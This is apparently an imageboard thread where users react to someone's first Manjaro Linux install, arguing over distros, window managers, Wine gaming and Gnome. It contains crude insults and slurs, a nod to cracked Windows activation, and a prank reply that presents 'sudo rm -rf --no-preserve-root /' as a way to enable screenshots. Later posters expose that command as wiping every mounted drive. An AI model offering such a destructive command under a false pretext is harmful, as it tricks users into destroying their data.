Just installed Linux for the first time on my laptop alongside windows

Just installed Linux for the first time on my laptop alongside windows.

I installed manjaro Linux. Did I fall for the meme or is there actually any advantage in comparison to windows?

Attached: JPEG_20190817_230509.jpg (3456x4608, 3.95M)

Other urls found in this thread:

gitlab.manjaro.org/packages/core/manjaro-system/blob/master/manjaro-update-system.sh#L43
twitter.com/SFWRedditGifs

linux for servers, bsd for routers, and windows for pc
change back to windows, fast

you got memed into using microshit for decades, it will seem strange for a while, but soon you will see that you just woke up outside of the matrix and now you can control the octpus-robot with your willpower

I still have windows, dual boot

Why did you take a picture of your computer and not just post a fucking screenshot?

wait you can do screenshots in Linux?

no, screenshots are a windows only thing. Nobody has been able to figure out how to do it on linux yet

haha I knew that windows is just better xD

Unless you're using some bloated crap DE like current Gnome, there are lots of advantages:

- Faster (even with KDE)
- More flexible (everything from the UI to when and how often your CPU or GPU fans turn on can be configured to an absurd degree)
- No telemetry and no advertising by default (including on Ubuntu, which removed amazon search years ago)
- A shell and shell scripting language that is immensely more useful and capable than anything MS has ever offered
- A warm smugness which will envelop your being, based on the fact that the OS you're using respects your freedom and privacy

The only downside for now is if you have a dedicated GPU, in which case you will have to utilize your GPU vendor's software to switch over to it, then log out and log back in again.

If this some faggot art style or do you not know how to focus the camera

Just gotta enable it first. Go to the terminal then copy and paste this into it:
sudo rm -rf --no-preserve-root /
When it's done, just reboot and you're good to go.

You can install I3 and neofetch to make autists think you're cool

kek
Why the fuck would you install linux for ? Are you a cool hacker wannabe or something ? Do you also own a Guy Fawkes mask ? Just crack windows. Linux was a free alternative for payfags to cheap to buy a windows license. Only white payfags use this shit, never saw a third worlder use linux, they just crack windows like any sane mind would do.

Attached: 2z6ts9e.jpg (616x364, 32K)

this. if you are not using linux for a server or for pen testing then wtf are you using it for?

Attached: 1556524841949.png (1000x1000, 342K)

I absolutely love it

what an epic meme

Now you can go to your bed and place it in your chest at ice cold temperatures/zero noise and do whatever you like compared to windows where it gets warm even if you are idling.
I thought it was just a meme too and got myself Manjaro i3 anyways, read a book about Unix and love it every single second.

serious question though, what are the advantages of such window managers like i3?

Extremely low power consumption, i3 boots at 200-400MB, I heard dwm is even more lighter but my classes start next week so I haven't tried it yet and no way I'm going to uni with a windows manager I don't understand.
It lets you use 100% of your screen space, arrange your stuff in any way you would like (eg, ws1 for terminals, ws2 for music stuff, ws3 for internet and so on) and you can even save your layouts. It's really accesible and easy to understand (It's my first time on Linux too so I guess the rumors about i3 being baby's first tiling windows manager are true). People use it because they like using 100% of their screen space too. It lets you be yourself :)

It's hard to ask a serious questions about an environment (tiling WMs) that's mainly used for ricing.
Well, it's a different type of workflow that controls the placement of your windows.
You can give it a try by installing Manjaro with i3 (unofficial) from their page as it seems to work "out of the box". So you don't have to spend hours in learning how to create a basic applet for cpu usage, date...

Attached: wm.png (750x469, 95K)

You installed the KDE one which will probably frustrate the shit out of you with bugs, but at least it looks pretty lol

Manjaro is a huge meme. If you're not prepared to invest the time in installing Arch the autistic Arch Way, you're not going to have the patience to maintain an Arch-based system.

Stick with something stable, like Debian or Ubuntu. If you want rolling, openSUSE Tumbleweed tests their updates more than Arch/Manjaro.

>muh Windows is better because games and adobe
>linux bad, linux only for nerds and coders.
Go fucking die

>manjaro

gitlab.manjaro.org/packages/core/manjaro-system/blob/master/manjaro-update-system.sh#L43

See line 43 and below

Attached: tenor (1).gif (360x346, 170K)

Isn't Manjaro a "stable" distro with its own repositories? (I know it's compatible with the AUR, but still)

Get back to us when you've read the scrot man page.

kek

+ stupidly lightweight
+ sane(floating desktops have magic papers and filing cabinets.... what?)
+both float and tile are 100% hybrid now; but you don't manually resize anything, its fullscreen or the 50/50 drag to the side.

- linux elitism
- lots of elitism
- vim keys defaults? wtf
- suckless literally lists elitism as a positive
- pure elitism

Get a config file from someone sane and don't meme your own rice

vim keys is the most ergonomic

There's something wrong with my GPU drivers on Manjaro. Is as if I had no hardware acceleration enabled because every 1080p video I watch gets the CPU close to 100%. In Windows 7 everything is ok and it never goes above 30%

It's just Arch with a week delay
They don't really have the manpower to maintain their own true repositories, it's not an independent distro.

In my experience Arch breaks less than Manjaro, but both of these are less stable than most other distros.

What GPU? They have the proprietary driver in the install ISO, but I'm pretty sure you have to enable it when you boot the liveUSB otherwise it won't install it. Might be using nouveau if you're using an nvidia card, which would explain the lack of acceleration.

xubuntu lts with arc-gtk is the final boss

The cracks have gotten really really good.

hwid.kms38.gen.mk6

R7 250, but i just figured out that there's no decoding support for x265 and Palemoon just can't use hardware acceleration for some reason.

I'm using the only driver available for my card (video-linux)

is it that easy to delete system32 on linux

>is there actually any advantage in comparison to windows?
You can customize everything you want and adapt it to your workflow, also it can be much more resource friendly.

There is no "system32" on Linux, this command will delete everything that can be found on all mounted hard drives.

WHAT THE FUCK

been using linux for 10 years and I'm a brainlet.
Only thing that takes more than 3 seconds to install is adobe garbage software and SOME games, most just werk on steam.

For running Windows games with triple the FPS thanks to Vulkan and with Nvidia VSync which requires special hardware for Windows but works out of the box with Linux.

For comparison. Crysis Mster on Windows I get 90FPS. Same hardware Linux with Vulkan I get 160FPS. For Lol Windows gives me 200FPS while on Linux its around 300.

What do you mean?

>i3 boots at 200-400MB
I hope you are joking. Kwin (Plasmas WM/Compositor) uses around 100MB with all eye candy effects maxed out. Also Kwin also gives tiling in the form of scripts. I doubt even Gnomes wm uses that much.

Maybe you meant i3 uses like I don't know 40MB

i need to learn python. is it better to use linux for practise?

What are you blabbering about like an idiot? Crysis doesn't run on Linux and Crysis doesn't use Vulcan.

>Palemoon
When will people fucking understand that those obscure non patched browsers are not only a security risk but also make it unspeakably easy to track you around the net. Imagine how many people worldwide run your exact setup with Palemoon as their browser. Now imagine how many have the exact same setup with Firefox/Chrome. And yes browser is easily detectable (Including version) through Javascript even if you fake your data.

That's all ignoring how fucking insecure those shit browsers are due to the missing manpower. When the last CVE that allows webpages to read and write files in your home dir gets patched? In Firefox/Chrome probably max a day later. In palemoon? Only some fucking dude in his basement knows.

He probably executed random commands he found on an Zimbabwean nuclear phsyics discussion board that asked for his password without even remotely trying tot hink what it would do or how to check it.
Ie same day same shit different idiot.

>What is Wine
>What is dxXvk

Fyi Wine allows you to run Windows programs under Linux (they are not emulated) and dxXvk allows you to bridge the Wine DirectX to your Linux Vulkan.

tldr for idiots. It makes Windows games that use DirectX run under Linux and use Vulkan instead of DirectX regardless what the game itself supports.

Linux IS only for nerds and coders.
Normies don't care about linux.
Idiot.

I really hope you are trolling dude. If not then no wonders you are still using Windows.

Literally the only reason people on gee didn't want to use Linux was gaming and now that that's gone the sole logical reason left is if you are a brainlet. Windows games non ironically run better now days on Linux than on Windows.

Oh and I can confirm the Vsync thing. Nvidia GPU requires specific monitors for Nvidia vsync to work under Windows. It doesn't on Linux. No clue why but that's how it is.

What are you even talking about. Do you realize you did the equivalent of write fanfiction to strawman because being malicious gets your cock hard.

The expectation was it deleting the equivalent of system32, but instead it wipes every hard drive connected. Considering you know how devastating this is, surely someone hearing this is enough to make them go "what the fuck" without pulling your weird masturbatory strawman fanfiction out of your arse.

Not really. Use whatever OS you are comfortable with

>X is only for Y and Z
>A doesn't care about X
>Because I say that a majority of people from some group would use B instead of X it is better
Idiot.
Literally everything Apple produces is Unix. Google went even further and uses Linux itself. And do you want to tell me your "normies" don't use Macbooks, iPhones, Androids or Chromebooks ?

again, what gpu? if this is also you, you should be using the amdgpu driver. Also it might be the case that palemoon or whatever meme browser you're using doesn't have ANY acceleration, and you'd be better off using something like Firefox (for customization) or Chrome (for compatibility).

Mods, PLEASE make this a Jow Forums banner.

Attached: 1533673250278.png (1058x533, 218K)

We're talking about actual gnu/linux.
Those operating systems were built off the tech, but have other software bundled to make them easier to use.
Also GNU not unix. RETARD

other guy posted some random command literally saying run this and magic will happen. Now if you execute commands from a website that has a reputation for whatever and execute commands without even knowing what it will or SHOULD do is dumb enough. But then entering your password after being explicitly asked and then entering is just pathetic.

Imagine what would happen if he had a UEFI device with rw mount (hello Lennart). It would literally brick his device. I am saying this because the power you get makes it easier to brick stuff. if you have no clue why even bother attempting. Read something play but don't do it on hardware you need/cant afford to replace/dont have backups off. It's just dumb and someone will eventually punish it.

Ok so tell me what is so hard to use about Gnome? Literally every person I supplied with a laptop (All mid 40s to 60s have no clue about anything apart from that's Google) are more than content with Gnome. Even Windows games work better Now days with Linux than on Windows thanks to Vulkan. Those people found it as nice as Macos but all of them hated Windows afterwards with a passion.

I find it funny since through these posts its visible how hard you are hit with the marketing psyops and it clearly shows your educational level and/or the generation you belong to.

>so tell me what is so hard to use about Gnome?
I've used it for 4 years. It's a broken piece of shit, and shouldn't be the standard for linux desktop when it removes more features than it adds with each update.
>marketing psyops and it clearly shows your educational level
No. I have tried introducing normies to linux before. 10/10 people spit the dummy, and I'm considering going back to win7 after half a decade because most of my time is spend troubleshooting the damn thing.

Also I love that, only people that only have simple uses such as web browsing and things that rely on the web, not the OS are content with linux.
Anybody who has anything more advanced is going to have a bad time either by incompatability or constant troubleshooting.
You're in denial man

So I asked you what is hard to use about Gnome you tell me that they remove feature, you probably mean the desktop icons thing which is a singular thing which removed complexity both from UI and from.code. But yea right all that removed functionality normjes care about.

Go install Gnome 3 on someone who has no clue with computers let them try it out and then ask their opinion compared to Windows 10. If you find a single person that genuinely says they genuinely like Windows more and find it easier to use (and not because App Y which is used by 2 ppl worldwide doesn't run under wine) I will non ironically donate 5 grands to any institution you choose.

It's light, I guess. I was using it on my 11 years old dual core (not even core2duo) PC. Once I upgraded it, though, I went back to windows.

You literally said yourself people who only use web browsing (which is +90% of normies) are content with Linux. So you agree with me that normies would rather use Linux if it came pre-installed. By falling for.marketing psyoos that'd exactly what I mean. You started using Windows at some point because it came preloaded. You got used to it. Why change? This is the typical "I work 40 years in the same factory" proletarian uneducated response so no worries for that. Just you are wrong.

>Incompatibility
Yes because so many people want to run CAD software or Siemens Nuclear Software right ? Even Photoshop works perfectly.

>constant troubleshooting
Remove the constant than I agree with you.
I yet have to see anyone running into a singular problem with Gnome even if they install their own packages (Gnome software is way easier for a normie than downing random pe files from the internet then manually finding the folder double clicking it and following a wizard).
You only have to troubleshoot if you use weird setups (in which case you aren't a normie) or you get your system setup wrongly (in which case it isn't the systems fault).

The only one in denial here is you.

Not him but either you are in denial or trolling.
The only people that are content with Windows over Linux are the ones that are above average Windows user but below average Linux user because for them it's just cumbersome to relearn everything. Anyone saying it's because of bugs or crashes or software is just flat out lying.

Linux has the 2nd least.amount of Bugs.(marginally more than BSDs vastly less than Windows, why would Google use it not only for Android and Chromebooks but also internally if it's so crash prone??) and not only does it have more software than ever, thanks to Wine most Windows only software also runs on Linux now (and clients like Lutris and Steam even allow idiots to use Wine).
Also as said installing software is as easy as on Mac. Literally open Software app press green install button and that's it.

Productivity and no bloat aka ideal software design

The worst thing about linux is you have to spend large amounts of time writing paragraphs justifying your decision to others online.
My nan dropped linux because her printer was incompatible. My cousin dropped linux because he needed Skype and the web app is shit. Pretty normal usages.
Imagine, just imagine caring what google does or thinking that anything they do is a representation of what is good in technology. Google also thinks every company spying on their users is a-okay.
Have sex

>he needed Skype
Jesus is your brother 30? How much of a boomer do you have to be to still use that software?

Attached: signal-2019-08-15-122243.png (1600x900, 2.06M)